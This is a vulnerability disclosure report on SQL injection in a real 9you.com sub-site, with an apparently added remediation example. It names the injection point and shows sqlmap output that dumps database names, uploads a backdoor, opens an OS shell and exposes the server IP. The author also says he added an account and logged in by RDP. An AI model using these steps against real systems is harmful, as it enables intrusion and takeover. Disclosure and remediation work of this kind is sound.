
SQL injection on an overseas site of 9you.com (久游网)

2014-10-22 21:55

A rather odd overseas sub-site: http://pk.music.9you.com/

Injection point: http://pk.ent.9you.com/front_aboutus.php?about_id=1



Databases enumerated:

Code:
[00:21:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.22, Apache 2.4.7
back-end DBMS: MySQL 5.0
[00:21:35] [INFO] fetching database names
[00:21:35] [INFO] the SQL query used returns 10 entries
[00:21:35] [INFO] retrieved: information_schema
[00:21:35] [INFO] retrieved: gici
[00:21:35] [INFO] retrieved: gicicrm
[00:21:36] [INFO] retrieved: giciinfo
[00:21:36] [INFO] retrieved: giciinfotest
[00:21:36] [INFO] retrieved: jiexi
[00:21:36] [INFO] retrieved: mysql
[00:21:36] [INFO] retrieved: pb
[00:21:37] [INFO] retrieved: pbtest
[00:21:37] [INFO] retrieved: test
available databases [10]:
[*] gici
[*] gicicrm
[*] giciinfo
[*] giciinfotest
[*] information_schema
[*] jiexi
[*] mysql
[*] pb
[*] pbtest
[*] test
The database account is root:

Code:
database management system users [2]:
[*] 'root'@'localhost'
[*] 'webadmin'@'127.0.0.1'

Commands can be executed directly through a shell; a net user account can be added.

Code:
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[00:27:18] [INFO] retrieved the web server document root: 'F:\'
[00:27:18] [INFO] retrieved web server absolute paths: 'F:/xampp/htdocs/gici/front_aboutus.php'
[00:27:18] [INFO] trying to upload the file stager on '/' via LIMIT 'LINES TERMINATED BY' method
[00:27:19] [WARNING] unable to upload the file stager on '/'
[00:27:19] [INFO] trying to upload the file stager on '/' via UNION method
[00:27:19] [WARNING] expect junk characters inside the file as a leftover from UNION query
[00:27:19] [INFO] the remote file F://tmpuvlhf.php is larger than the local file /tmp/tmpAjQmTA
[00:27:19] [INFO] trying to upload the file stager on '/xampp/htdocs/gici' via LIMIT 'LINES TERMINATED BY' method
[00:27:20] [WARNING] unable to upload the file stager on '/xampp/htdocs/gici'
[00:27:20] [INFO] trying to upload the file stager on '/xampp/htdocs/gici' via UNION method
[00:27:20] [INFO] the remote file F:/xampp/htdocs/gici/tmpuvlhf.php is larger than the local file /tmp/tmpabAlC4
[00:27:20] [INFO] heuristics detected web page charset 'ascii'
[00:27:20] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/gici' - http://pk.ent.9you.com:80/tmpuvlhf.php
[00:27:21] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/gici' - http://pk.ent.9you.com:80/tmpbvsrp.php
[00:27:21] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[00:27:50] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---

Windows IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 222.73.249.20
Subnet Mask . . . . . . . . . . . : 255.255.255.128
Default Gateway . . . . . . . . . : 222.73.249.126

Proof of vulnerability:

RDP on 3389 is also open to the internet; I simply added an account and logged in remotely....

(screenshot: 1.jpg)

Fix:

Well...
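The fix section above is empty, so here is an added illustration (not code from the report or from the site) of what the remediation looks like. The injectable query shape is assumed, since the report only shows that about_id is injectable; the table and column names, the aboutus_ro account and the DB_PASS variable are assumptions as well. The second point the report makes, that the application ran as the MySQL root account (which is what gave the stager the FILE privilege to write into the document root), is addressed by the connection setup at the bottom.

```php
<?php
// Added example: assumed vulnerable shape of front_aboutus.php next to a hardened version.
// Nothing here is the site's own code; names are assumptions.

// --- Assumed vulnerable pattern: the GET value is concatenated into the SQL text, ---
// --- so the caller controls the whole WHERE clause (UNION, subqueries, INTO OUTFILE). ---
function aboutus_vulnerable(mysqli $db, array $get): ?array
{
    $sql = "SELECT title, body FROM aboutus WHERE about_id = " . $get['about_id'];
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened version: validate the type first, then bind the value as a parameter. ---
function aboutus_safe(PDO $db, array $get): ?array
{
    // 1. about_id must be a positive integer; anything else is rejected before any SQL runs.
    $id = filter_var($get['about_id'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // 2. Prepared statement: the value travels separately from the query text,
    //    so it can never alter the statement's structure.
    $stmt = $db->prepare('SELECT title, body FROM aboutus WHERE about_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Least privilege: connect as a dedicated read-only account, never root.
//    Assumed grant on the DB side (no FILE privilege, so INTO OUTFILE cannot drop a stager):
//      GRANT SELECT ON gici.aboutus TO 'aboutus_ro'@'localhost';
//    Emulated prepares are disabled so MySQL performs real server-side binding.
$db = new PDO('mysql:host=127.0.0.1;dbname=gici;charset=utf8mb4',
              'aboutus_ro', getenv('DB_PASS'), [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);
$row = aboutus_safe($db, $_GET);
```

Pairing this with secure_file_priv set on the MySQL server and a non-root account closes the os-shell path the report shows even if another injection slips through.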


Source: www.wooyun.org/bugs/wooyun-2014-075318
